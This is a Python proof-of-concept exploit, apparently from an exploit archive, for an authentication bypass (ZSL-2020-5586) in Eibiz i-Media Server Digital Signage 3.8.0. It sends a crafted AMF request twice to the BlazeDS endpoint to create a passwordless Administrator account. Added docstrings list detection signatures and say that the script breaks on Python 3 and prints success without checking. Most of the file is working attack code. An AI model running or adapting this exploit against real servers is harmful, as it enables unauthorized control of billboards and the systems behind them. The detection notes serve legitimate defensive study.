## https://sploitus.com/exploit?id=PACKETSTORM:158944
#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
#  
#  
# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)  
#  
#  
# Vendor: EIBIZ Co.,Ltd.  
# Product web page: http://www.eibiz.co.th  
# Affected version: <=3.8.0  
#  
# Summary: EIBIZ develops an advertising platform for out-of-home media, which at  
# the time the world called "Digital Signage". Most business customers still  
# need to go outside to get in touch with products and services; online media  
# alone cannot reach them at the right place and the right time.  
#  
# Desc: The application suffers from an unauthenticated privilege escalation and  
# arbitrary user creation vulnerability that allows authentication bypass.  
# Once serialized, an AMF-encoded object graph may be used to persist and retrieve  
# application state or allow two endpoints to communicate through the exchange  
# of strongly typed data. These objects are received by the server without validation  
# or authentication, which gives an attacker the ability to create a user with  
# any role, bypass the security controls in place and modify the data presented on  
# the screen/billboard.  
#  
# =========================================================================================  
#  
# # python3 imedia_createUser.py 192.168.1.1 waddup  
#  
# --Sending serialized object...  
# --Replaying...  
#  
# ------------------------------------------------------  
# Admin user 'waddup' successfully created. No password.  
# ------------------------------------------------------  
#  
# =========================================================================================  
#  
# Tested on: Windows Server 2016  
# Windows Server 2012 R2  
# Windows Server 2008 R2  
# Apache Flex  
# Apache Tomcat/6.0.14  
# Apache-Coyote/1.1  
# BlazeDS Application  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2020-5586  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php  
#  
#  
# 26.07.2020  
#  
#  
  
import time as go  
import requests  
import sys  
import re  
  
class __CreateAdmin__:
    """Proof-of-concept client for ZSL-2020-5586 (Eibiz i-Media Server <= 3.8.0).

    Builds a hand-assembled AMF request for the BlazeDS endpoint
    ``/messagebroker/amf`` that asks the ``userService`` remoting destination
    to run ``createUser`` with a ``ds.model.User`` whose role is
    ``Administrator`` and whose password field is empty, then POSTs it twice.
    No session or credential is sent: the header comment above states that the
    server accepts these objects without validation or authentication, so the
    server-side mitigation is to enforce authentication and role checks on that
    destination (verify against the vendor fix).

    Detection hooks visible in the request this class produces: a POST to
    ``/messagebroker/amf`` with ``Content-Type: application/x-amf``, a
    ``Referer`` ending in ``/main.swf``, the non-browser User-Agent
    ``CharlieChaplin``, a body containing the strings
    ``flex.messaging.messages.RemotingMessage``, ``createUser``,
    ``ds.model.User`` and ``Administrator``, and fixed ``DSId`` / ``messageId``
    values (see amf()), repeated two seconds apart.
    """

    def __init__(self):
        # All attributes except ep/agent are filled in later by usage() and amf().
        self.ep = "/messagebroker/amf"   # BlazeDS AMF endpoint path
        self.agent = "CharlieChaplin"    # fixed, non-browser User-Agent string
        self.amfpacket = None            # request body (bytes), assembled in amf()
        self.bytecount = None            # one-byte AMF3 string header for the username
        self.bytesdata = None            # [bytecount], see amf()
        self.address = None              # target base URL, from argv[1]
        self.headers = None              # HTTP headers dict, built in amf()
        self.usrname = None              # username to create, from argv[2]
        self.ende = None                 # status line printed at the end of amf()

    def usage(self):
        """Parse ``sys.argv`` into ``self.address`` and ``self.usrname``.

        With anything other than exactly two arguments the banner and a usage
        line are printed and the process exits with status 12.  Otherwise a
        bare host/IP is prefixed with ``http://``.
        """
        if len(sys.argv) != 3:
            self.me()
            msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin"
            brd = "-" * len(msg + "\x20")
            print("\n" + brd)
            print(msg)
            print("\x20Usage: ./i-media.py [ip] [username]")
            print(brd)
            exit(12)
        else:
            self.address = sys.argv[1]
            self.usrname = sys.argv[2]
            # Substring test, not a prefix test: "http" anywhere in the argument
            # suppresses the scheme prefix.
            if not "http" in self.address:
                self.address = "http://{}".format(self.address)

    def amf(self):
        """Assemble the AMF request body, POST it twice and print a status line.

        The body is a ``flex.messaging.messages.RemotingMessage`` with
        ``operation`` = ``createUser`` and destination ``userService``; its
        payload is a ``ds.model.User`` object carrying ``self.usrname`` and
        the role ``Administrator``.  The request goes to
        ``self.address + self.ep`` with ``self.headers``; after a two second
        pause the identical request is sent again.

        NOTE(review): ``self.amfpacket`` is built from ``bytes`` literals,
        but the username length header is joined into a ``str`` before being
        appended; on Python 3 that ``+=`` raises ``TypeError`` before any
        request is sent, so the published script does not run unmodified.
        The HTTP responses are never inspected, so the closing "successfully
        created" banner is printed unconditionally and proves nothing.
        """
        # Headers imitate a Flash client loaded from <address>/main.swf.
        self.headers = {"User-Agent" : self.agent,
                        "Accept" : "*/*",
                        "Accept-Language" : "en-US,en;q=0.5",
                        "Accept-Encoding" : "gzip, deflate",
                        "Origin" : self.address,
                        "Connection" : "close",
                        "Referer" : self.address + "/main.swf",
                        "Content-Type" : "application/x-amf"}

        # AMF0 envelope: version 3, no headers, one message with target "null"
        # and response "/36", then a fixed body-length field (0x01B3).
        self.amfpacket = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E"
        self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00"
        self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11"
        # AMF3 object of class "flex.messaging.messages.RemotingMessage" and its
        # trait names: source, operation, timestamp, body, clientId, headers,
        # timeToLive, destination, messageId.
        self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
        self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67"
        self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73"
        self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67"
        self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
        self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65"
        self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69"
        self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62"
        self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E"
        self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65"
        self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F"
        self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74"
        self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D"
        self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01"
        # operation = "createUser"; the body is an object of class
        # "ds.model.User" with trait names password, create, tel, fax, name,
        # address, update, id, mobile, uDelete, department, role, read, email,
        # company.  The password slot is left empty ("No password" in the banner).
        self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55"
        self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A"
        self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64"
        self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70"
        self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63"
        self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C"
        self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65"
        self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D"
        self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64"
        self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75"
        self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65"
        self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09"
        self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64"
        self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F"
        self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06"
        self.amfpacket += b"\x01\x06\x01\x06" ##################"
        # Username field: a single header byte computed as 2*len+1 (presumably
        # AMF3's string header, which only fits in one byte for short names),
        # followed by the UTF-8 username.  The header is produced as a str here,
        # so appending it to the bytes body fails on Python 3 (see docstring).
        self.bytecount = len(self.usrname * 2) + 1
        self.bytesdata = [self.bytecount]
        self.amfpacket += "".join(map(chr, self.bytesdata))
        self.amfpacket += (bytes(self.usrname.encode("utf-8")))
        # Remaining ds.model.User fields; the role string is "Administrator".
        self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06"
        self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69"
        self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06"
        # Message headers "DSEndpoint" = "my-amf" and "DSId" =
        # "96B0BF8C-A11A-8A24-81C1-587EA3ACA38C", then destination
        # "userService" and messageId "99FECCF9-4A8D-FF41-1A66-BF912EBBD656".
        # Both ids are hard-coded constants; presumably a real Flex client
        # generates fresh ones, so they are a cheap signature — verify.
        self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44"
        self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74"
        self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09"
        self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42"
        self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31"
        self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31"
        self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33"
        self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00"
        self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72"
        self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46"
        self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38"
        self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41"
        self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45"
        self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########"

        print("\n--Sending serialized object...")
        req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
        #print(req.text.encode("utf-8"))
        go.sleep(2)
        # Same request again; the first response is never checked.
        print("--Replaying...")
        req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
        #print(req.text.encode("utf-8"))
        # Printed unconditionally — not evidence that the account was created.
        self.ende = "Admin user '" + self.usrname + "' successfully created. No password."
        print  # Python 2 leftover: a bare name expression, no-op on Python 3
        print("-" * len(self.ende))
        print(self.ende)
        print("-" * len(self.ende))

    def me(self):
        """Write the ASCII-art banner to stdout one character at a time."""
        # The art lines keep their (whitespace-mangled) form; the literal is
        # runtime output and is left exactly as published.
        cc = """  
  
/`,.,,,.   
:.......,,   
,.........7   
,.........$   
......:=+=$   
I.....,,:~,.:   
$.?7IZDDNNN~.   
$$: 8D=:I D,   
D~,7NI7DNN   
DDD NNN:   
D8.ININ;   
D8?7DZS   
.ZDNNND D   
S..,.~8?,N OO77   
N......,..$=77:+?=~8   
:......,::=.I8?:+=.=+~++   
=.......,:+$=+O:+==~~++++=   
8...........~7D$::~..~====:++   
I.............:+.....~~~=~:~+?   
N,............. .+...,:~=+~~ :+=$   
;....... ......, .,....,:=+:,..~=?   
Z,,...... :............,::~~=...===I   
=.......$ Z...... =~,,,,.,:~,...,7~=   
+....... 8.....,.=~~~:.~~~=:~ ..:$==   
,...... +,..,,:.=~:~+I:,+I=8:...=?~   
,....., =...,,,8+=,:~=~I=~~ N...:+?   
,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=?   
8...... ,...7=Z$DN:?::=I~~$ =..,=+   
...,..D ,....O88D,8D,:=:==+?? ...,:7   
,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+   
......8D .. .... :?~8D:.:~~=++ ..,~II   
:....~D+: . . . ..,..==~===N +,.,=$   
,. DDND.......... .,...,===+=N ..,+?Z   
DD 88 .......... ....,..~+=~N ..,~?I   
....... ,,.,,.:...=?? 8..~=I$   
....... ...,,,,. ,:~= ..:=~?   
........ ,.,,..,:.. I.:+?+D   
....... .......,:,,8 ,..IN   
........ .,.. ..,,:.: :8N   
........ ... ..,::,, I+O   
........ ......,:,. O.ZN   
........ . . ...,,,,. D+   
............ ....,,,. =   
....... . ....,,, ?   
....... .....,,, 7   
...... . ..,,,, +   
:..... ..,.,, 8   
:....... =. .....,,,N 8   
~....... D. .....,,,D 8   
~....... D. . ...,,,O D   
=.... .....,,Z ?`   
+...... . :........,.$ +   
I...... ........,.7 =   
Z........ . . ....,,7 D   
N..... ... . ........I 8   
..... ... , ........I 8   
...... . = .. .....I 7   
:.. . ..7 8... .....I ?   
Z.. D .. ....7 N NND88OOOOOOO88DN   
O.. . .. ....O O D8OZ$77II777$$ZO8DN   
... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN   
.,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N   
$.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN   
... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N   
Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N   
=.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN   
... .?, I777IIIIIIIII7$~O8N NNNNN   
8.... .I. ...7IIIIII7$Z8DD NNNNN   
NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN   
N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN   
?,:..:,.=N I.....,,=I+ N8   
~....,8   
  
"""

        j = 0
        while j < len(cc):
            char = cc[j]
            sys.stdout.write(char)
            go.sleep(10.0 / 100000.0)  # 0.1 ms per character: typewriter effect
            j = j + 1

    def main(self):
        """Entry point: parse argv (usage) then build and send the request (amf)."""
        self.usage()
        self.amf()
  
# Script entry: instantiate the PoC client and run it when executed directly.
if __name__ == "__main__":
    client = __CreateAdmin__()
    client.main()